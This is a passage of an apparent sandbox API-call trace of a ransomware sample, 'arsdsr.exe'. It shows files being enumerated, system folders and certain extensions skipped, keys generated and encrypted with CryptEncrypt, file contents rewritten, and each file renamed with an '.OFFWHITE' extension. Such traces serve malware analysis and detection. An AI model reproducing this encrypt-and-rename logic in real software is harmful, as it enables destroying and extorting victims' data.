hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.128] GetLastError () returned 0x0 [0145.128] GetLastError () returned 0x0 [0145.128] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x77660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.128] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.128] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x77760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.128] WriteFile (in: hFile=0x218, lpBuffer=0x52eb60*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb60*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.128] GetProcessHeap () returned 0x500000 [0145.128] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x77560) returned 0x2960048 [0145.128] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.128] ReadFile (in: hFile=0x218, lpBuffer=0x2960048, nNumberOfBytesToRead=0x77560, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesRead=0x295d1c0*=0x77560, lpOverlapped=0x0) returned 1 [0145.158] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.158] WriteFile (in: hFile=0x218, lpBuffer=0x2960048*, nNumberOfBytesToWrite=0x77560, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesWritten=0x295d1cc*=0x77560, lpOverlapped=0x0) returned 1 [0145.160] GetProcessHeap () returned 0x500000 [0145.160] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960048 | out: hHeap=0x500000) returned 1 [0145.160] CloseHandle (hObject=0x218) returned 1 [0145.160] GetProcessHeap () returned 0x500000 [0145.160] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.160] GetProcessHeap () returned 0x500000 [0145.160] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.160] GetProcessHeap () returned 0x500000 [0145.160] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.160] GetProcessHeap () returned 0x500000 [0145.160] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.160] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" [0145.160] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.OFFWHITE" [0145.160] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.offwhite")) returned 1 [0145.161] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb31c100, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcb31c100, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x25b60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="..") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="...") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="windows") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="rsa") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="programdata") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="program files") returned 1 [0145.161] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0145.161] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.161] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="WWINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" [0145.161] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.161] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.161] PathFindExtensionW (pszPath="WWINTL.DLL.trx_dll") returned=".trx_dll" [0145.161] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.161] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.161] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.161] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.162] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.162] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.162] GetProcessHeap () returned 0x500000 [0145.162] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb70 [0145.162] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.164] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=154464) returned 1 [0145.164] GetProcessHeap () returned 0x500000 [0145.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.164] GetProcessHeap () returned 0x500000 [0145.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.164] GetProcessHeap () returned 0x500000 [0145.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.164] GetProcessHeap () returned 0x500000 [0145.164] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.164] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.164] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.164] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.164] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.164] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.164] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.164] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.164] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.164] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.165] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.165] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.165] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.165] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x25b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.165] SetLastError (dwErrCode=0x0) [0145.165] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.167] GetLastError () returned 0x0 [0145.168] GetLastError () returned 0x0 [0145.168] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x25c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.168] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.168] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x25d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.168] WriteFile (in: hFile=0x218, lpBuffer=0x52eb70*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb70*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.168] GetProcessHeap () returned 0x500000 [0145.168] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x25b60) returned 0x5607c8 [0145.168] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.168] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x25b60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x25b60, lpOverlapped=0x0) returned 1 [0145.178] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.178] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x25b60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x25b60, lpOverlapped=0x0) returned 1 [0145.178] GetProcessHeap () returned 0x500000 [0145.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.179] CloseHandle (hObject=0x218) returned 1 [0145.179] GetProcessHeap () returned 0x500000 [0145.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.179] GetProcessHeap () returned 0x500000 [0145.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.179] GetProcessHeap () returned 0x500000 [0145.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.179] GetProcessHeap () returned 0x500000 [0145.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.179] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" [0145.179] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.OFFWHITE" [0145.179] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.offwhite")) returned 1 [0145.180] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb31c100, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcb31c100, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x115b60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="..") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="...") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="windows") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="rsa") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="programdata") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="appdata") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="program files") returned 1 [0145.180] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="program files (x86)") returned 1 [0145.180] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.180] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="WWINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" [0145.180] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.180] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.180] PathFindExtensionW (pszPath="WWINTL.REST.trx_dll") returned=".trx_dll" [0145.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.181] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.181] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.181] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.181] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.181] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.181] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.181] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.181] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.181] GetProcessHeap () returned 0x500000 [0145.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb80 [0145.181] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.181] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=1137504) returned 1 [0145.181] GetProcessHeap () returned 0x500000 [0145.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.181] GetProcessHeap () returned 0x500000 [0145.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.181] GetProcessHeap () returned 0x500000 [0145.182] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.182] GetProcessHeap () returned 0x500000 [0145.182] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.182] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.182] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.182] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.182] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.182] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.182] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.182] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.182] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.182] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.182] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.182] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.182] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.182] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x115b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.182] SetLastError (dwErrCode=0x0) [0145.182] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.184] GetLastError () returned 0x0 [0145.184] GetLastError () returned 0x0 [0145.184] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x115c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.184] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.185] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x115d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.185] WriteFile (in: hFile=0x218, lpBuffer=0x52eb80*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb80*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.185] GetProcessHeap () returned 0x500000 [0145.185] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x115b60) returned 0x2a60020 [0145.185] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.185] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x115b60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x115b60, lpOverlapped=0x0) returned 1 [0145.304] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.304] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x115b60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x115b60, lpOverlapped=0x0) returned 1 [0145.307] GetProcessHeap () returned 0x500000 [0145.307] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0145.327] CloseHandle (hObject=0x218) returned 1 [0145.327] GetProcessHeap () returned 0x500000 [0145.327] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.327] GetProcessHeap () returned 0x500000 [0145.327] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.327] GetProcessHeap () returned 0x500000 [0145.327] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.327] GetProcessHeap () returned 0x500000 [0145.327] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.327] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" [0145.327] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.OFFWHITE" [0145.327] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.offwhite")) returned 1 [0145.328] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6b688100, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6b688100, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x25360, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0145.328] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".") returned 1 [0145.328] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="..") returned 1 [0145.328] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="...") returned 1 [0145.328] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="windows") returned 1 [0145.328] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.328] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", 